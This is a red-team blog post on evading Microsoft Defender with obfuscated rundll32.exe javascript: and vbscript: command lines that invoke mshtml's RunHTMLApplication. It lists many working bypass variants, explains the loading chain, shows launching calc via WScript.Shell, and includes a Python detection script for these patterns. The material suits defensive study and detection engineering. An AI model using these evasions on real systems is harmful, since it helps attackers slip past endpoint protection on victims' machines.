Update: Defender Bypass using a comma

Update

Update: Microsoft was quick to update the Defender rules; the researcher @hyp3rlinx responded with this new evasion. The article has been updated accordingly.

Note that this doesn’t work in PowerShell, only in cmd.

cmd

   > rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert("Hello Red")

Original comma bypass

made by @hyp3rlinx

cmd
   > rundll32.exe javascript:"\..\mshtml,,,RunHTMLApplication ";alert("Hello Red")

Bonus - my variations

made by вЯ!¢К3ժ

cmd

> rundll32.exe javascript:"..\\..\\../mshtml..\\..\\mshtml , RunHTMLApplication # ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../mshtml-..\\../../mshtml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../-mshtml-*-..\\../../mshtml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../::ms;..\\../../mshTml , , ,  RunHTMLApplication ";alert("Hello Red")
> rundll32.exe javascript:"..\\../../::lh;..\\../..\\mshTml,RunHTMLApplication ";alert("Hello Red")

They all bypass Defender at the time of writing.

Both should give you a good idea of how to find your own obfuscation, although that takes time.

Analysis - how rundll32.exe can do JavaScript

I think the comma bypass is rather self-explanatory, so let’s look at how the rest of the chain works:

  1. RunDll32 Process
    1. Analyzes the command, determining the target DLL is: javascript:"\..\mshtml
    2. Encounters an error trying to load it as an absolute directory path.
    3. Unable to locate a matching file in either the current directory or any system path.
    4. Does not find a corresponding manifest file javascript:"\..\mshtml.manifest for the DLL.
    5. Proceeds to invoke LoadLibrary function.
  2. LoadLibrary Function
    1. Appends the .dll extension, attempting to load javascript:"\..\mshtml.dll
    2. Interprets the path relatively, moving up from the simulated javascript:"\ directory.
    3. Searches and successfully locates mshtml.dll in the System folder.
    4. Successfully loads the DLL, with RunHTMLApplication serving as the entry function.
  3. RunHTMLApplication Routine
    1. Tries to run the script ";alert('foo');
    2. Encounters syntax issues with the script and retrieves the original command line input, yielding javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');
    3. Seeks to launch this URI, querying the system for the handler of the javascript protocol, commonly associated with Microsoft HTML Javascript Pluggable Protocol in the system registry.
    4. Executes the script: "..\mshtml,RunHTMLApplication ";alert('foo');
  4. Javascript Execution
    1. Initiates with a string declaration, which is syntactically correct, preventing any errors.
    2. Proceeds with the execution of the subsequent script components.
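The loader behaviour walked through above also tells a defender what to key on: whatever traversal, comma or space padding sits in front of it, the module rundll32 ends up loading is still mshtml.dll and the export is still RunHTMLApplication. The following detection logic is an added example of mine, not code from the original article or from the researcher; it approximates the module and export resolution described above (split at the first comma, ignore the javascript:/vbscript: prefix, walk the path components, append .dll) and runs it over constructed sample command lines that reproduce the variants shown in this article plus two benign rundll32 invocations as controls. The parsing is a detection-oriented approximation, not a reimplementation of rundll32 or LoadLibrary, and it generalizes beyond the listed variants to any mix of separators and padding that resolves the same way.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation command lines, as a Sysmon Event ID 1 or EDR
# "CommandLine" field would record them. The first five reproduce variants from
# this article; the last two are benign rundll32 invocations used as controls.
SAMPLE_COMMAND_LINES = [
    r'rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert("Hello Red")',
    r'rundll32.exe javascript:"\..\mshtml,,,RunHTMLApplication ";alert("Hello Red")',
    r'rundll32.exe javascript:"..\\..\\../mshtml..\\..\\mshtml , RunHTMLApplication # ";alert("Hello Red")',
    r'rundll32.exe javascript:"..\\../../::ms;..\\../../mshTml , , ,  RunHTMLApplication ";alert("Hello Red")',
    r'rundll32 vbscript:"\\..\\mshtml\\..\\shtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("http://Wscript.Shell").Run("calc.exe"),0)',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\temp\file.txt',
]

SCRIPT_PROTOCOLS = ("javascript:", "vbscript:")
# The rundll32 image name, bare or with a full path, quoted or not.
RUNDLL32_RE = re.compile(r'(?:^|[\s"\\/])rundll32(?:\.exe)?(?=["\s]|$)', re.IGNORECASE)


@dataclass
class Rundll32Call:
    raw: str
    module: str        # file name the loader would end up resolving, e.g. "mshtml.dll"
    export: str        # export rundll32 would call, lower-cased, e.g. "runhtmlapplication"
    indicators: list   # names of the suspicious traits found


def rundll32_arguments(cmdline):
    """Return the text after the rundll32 image name, or None if this is not rundll32."""
    m = RUNDLL32_RE.search(cmdline)
    if m is None:
        return None
    return cmdline[m.end():].lstrip(' "')


def resolve_module(args):
    """Approximate which file the loader resolves for the module part of the arguments.

    Mirrors the steps described in the article: split at the first comma, drop the
    script protocol prefix, walk the path components, append .dll. This is an
    approximation for detection purposes, not a reimplementation of rundll32.
    """
    head = args.split(',', 1)[0].replace('"', '').strip()
    for proto in SCRIPT_PROTOCOLS:
        if head.lower().startswith(proto):
            head = head[len(proto):]
    # Only the final path component names the file; every "..\" or "../" before it is
    # walked by the loader, which is why all the traversal variants end at mshtml.
    parts = [p.strip() for p in re.split(r'[\\/]+', head) if p.strip()]
    name = parts[-1].lower() if parts else ''
    if name and not name.endswith('.dll'):
        name += '.dll'
    return name


def resolve_export(args):
    """Export name after the first comma; surplus commas and spaces are skipped."""
    split = args.split(',', 1)
    if len(split) < 2:
        return ''
    m = re.match(r'[\w@#]+', split[1].lstrip(' ,'))
    return m.group(0).lower() if m else ''


def evaluate(cmdline):
    """Classify one command line; returns None for processes that are not rundll32."""
    args = rundll32_arguments(cmdline)
    if args is None:
        return None
    module, export = resolve_module(args), resolve_export(args)
    lowered = args.lower()
    indicators = []
    if any(p in lowered for p in SCRIPT_PROTOCOLS):
        indicators.append('script-protocol-as-module')
    if module == 'mshtml.dll' and export == 'runhtmlapplication':
        indicators.append('mshtml-runhtmlapplication')
    if re.search(r'\.\.[\\/]', args):
        indicators.append('path-traversal-in-module')
    if re.search(r',\s*[,\s]', args):
        indicators.append('comma-or-space-padding')
    if re.search(r'wscript\.shell|activexobject|createobject', lowered):
        indicators.append('shell-object-from-script')
    return Rundll32Call(cmdline, module, export, indicators)


def scan(cmdlines):
    """Return the rundll32 calls that carry at least one indicator."""
    hits = []
    for line in cmdlines:
        call = evaluate(line)
        if call is not None and call.indicators:
            hits.append(call)
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(f'{hit.module},{hit.export}: {", ".join(hit.indicators)}')
```

The point of normalizing first and matching second is that a rule keyed on the literal string `mshtml,RunHTMLApplication` is exactly what the comma and traversal variants defeat, while a rule keyed on the resolved module and export, plus the bare fact that a script protocol is being passed as a module name, holds across all of them; in production the same logic belongs in whatever query language the EDR or SIEM offers, with the `script-protocol-as-module` indicator alone being enough to alert on.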

Pop calc

Next, let’s try and pop calc from JavaScript using the classic ActiveX - because we can. :)

cmd
   > rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

People on Twitter took a similar, yet slightly different approach:

cmd

> rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("http://Wscript.Shell").Run("calc.exe"),0)
> rundll32 vbscript:"\\..\\mshtml\\..\\shtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("http://Wscript.Shell").Run("calc.exe"),0)

Conclusion

rundll32.exe can do many things, amongst them executing DLL functions and running JavaScript - it’s really useful to have another evasion that’s quick and easy - my favourite. In an upcoming article we’ll discuss rundll32AllTheThings: running DLL functions, proxy execution that kills the underlying rundll32 process after starting calc.exe, and running code from the network.

https://lolbas-project.github.io/lolbas/Binaries/Rundll32/
https://www.stormshield.com/news/poweliks-command-line-confusion/

Researcher Profile

The comma bypass was found by: https://twitter.com/hyp3rlinx

All the other stuff I did myself, researching on Google / StackExchange and playing in the lab.